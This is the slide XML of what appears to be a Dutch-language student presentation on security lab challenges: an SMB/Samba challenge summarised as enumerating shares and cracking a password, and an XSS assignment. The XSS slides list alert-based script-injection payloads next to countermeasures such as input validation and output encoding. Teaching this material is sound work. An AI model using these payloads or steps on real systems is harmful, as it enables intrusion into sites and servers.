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0" r:id="rId6"/>
    <p:sldId id="262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75E50C-3B64-1977-7804-B210276C6379}" v="9" dt="2023-05-10T11:38:51.705"/>
    <p1510:client id="{23C911B7-AD8C-4E47-7EC0-E49777CBBBE9}" v="7" dt="2023-05-10T11:41:48.896"/>
    <p1510:client id="{55E79FF0-0661-F027-60ED-58DF2D82033B}" v="12" dt="2023-05-10T11:41:14.556"/>
    <p1510:client id="{AC2DF405-FA5B-5872-0F3D-BE6872DF7C20}" v="96" dt="2023-05-10T11:52:19.284"/>
    <p1510:client id="{C752D83E-62BE-D683-E38F-AE91C8E03FED}" v="150" dt="2023-05-13T15:22:17.088"/>
    <p1510:client id="{DC3F7C9E-226A-9B5D-1D3B-646B4AA8E72A}" v="15" dt="2023-05-10T11:42:49.799"/>
    <p1510:client id="{F0315CA2-9EA4-3061-2B15-F5D70668BB47}" v="6" dt="2023-05-10T11:43:14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1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24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50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9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53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7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8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29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70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22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01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113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xample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AA2C472-86BA-7110-237A-B64CDF6F09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8AD2E76-A85C-F233-AB38-F3E7B93F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nl-BE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Presentatie PE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59F8EC4-CFAA-5602-B427-474934150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nl-BE" sz="3200"/>
              <a:t>Fenne Thijs, Jäcy Meert, Iben Jackers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-BE" sz="3200"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-BE" sz="3200"/>
              <a:t>1TINB4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A6A966C-BDD8-5628-BF56-F4B026817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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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7931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5" descr="Afbeelding met overdekt, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E86C443-85B0-B2B5-8563-143EE238D7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766C170-2F49-9115-AE2F-71DA9BD0A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Samba Challenge: SMBclient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3EAC54-522D-F08F-35EA-86062C9EF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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>SMB/CIFS </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server Message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Blocken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> en Common Internet File System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>protocollen voor bestandsdeling en netwerkcommunicatie tussen computers</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wat</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-line tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>interacting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SMB/CIFS servers.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gebruik</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Verken, verbind en manipuleer bestanden op SMB/CIFS-servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-BE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41DF614-5DDD-5ACD-0C7A-10920363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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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125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5" descr="Afbeelding met overdekt, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E82707-7E68-3AD8-35E6-CA5734FCCB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-59247" y="10"/>
            <a:ext cx="12191979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0F01CFC-7BB1-F2F1-728E-2B7A9A90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Samba Challenge: Conclusie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1673BA-50F7-B6F8-69BE-5BBCBBC91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Samenvatting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Onderzoek SAMBA-service, ontdek shares, kraak wachtwoord, analyseer bestanden.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Belang van beveiliging van SAMBA-services benadrukt.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Regelmatige audits en beveiligingsmaatregelen zijn essentieel.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nl-BE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D4B04C0-90ED-2BEC-975A-3DC6A9FC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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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6939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5" descr="Afbeelding met overdekt, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80A0D9FB-1397-0F64-5589-751CD0B55A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68882A3-6A69-FA24-071F-21F3C1C1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XSS 1: Opdracht – Payload 1 - 2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55B1BC2-4644-3615-6E42-026C3AE06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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: &lt;script&gt;alert('XSS');&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="x" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="alert('XSS');" /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> XSS</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Counter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>measures</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>validation</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>encoding</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nl-BE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07C5C83-E311-0294-509E-9A23F2302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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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4405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4" descr="Afbeelding met licht, donker, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C7721BF-1ACF-5532-1999-5FD3A5E406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F9C236-7E3C-39D1-CCC5-48099063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XSS 1: Opdracht – Payload 3 - 4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42888B-6242-01C6-DB11-5FE718AB2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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>');&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="x" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="alert('XSS');" /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3');alert(‘XSS’)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DOM-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Counter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>measures</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>encoding</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/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C0E569F-F34A-3F10-9357-CBDA64B8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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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5205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4" descr="Afbeelding met licht, donker, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8774B40-3603-10CD-F6A0-50C87FBFE0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E88516F-C672-AFC2-DA7D-5BECF9BC4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XSS 1: Opdracht – Payload 5 - 6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918DA4-AAFE-5B26-A1CA-3A9FB1570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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('XSS')</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>data:text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>plain,alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('XSS')</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> XSS</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> XSS</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Counter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>measures</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sanitization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>encoding</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-BE" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/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D0781BC-1A98-A316-3373-5245B385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08F0-1CA5-42D0-9FB7-733E1247A3AC}" type="slidenum">
              <a:rPr lang="nl-BE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2147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4" descr="Afbeelding met licht, donker, keyboard&#10;&#10;Automatisch gegenereerde beschrijving">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{885DCBEC-0956-6607-FDC0-649250F4B6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83" r="16073" b="909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606E36E-63B0-AE06-5BED-9888995A0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370332"/>
            <a:ext cx="7091063" cy="1124712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
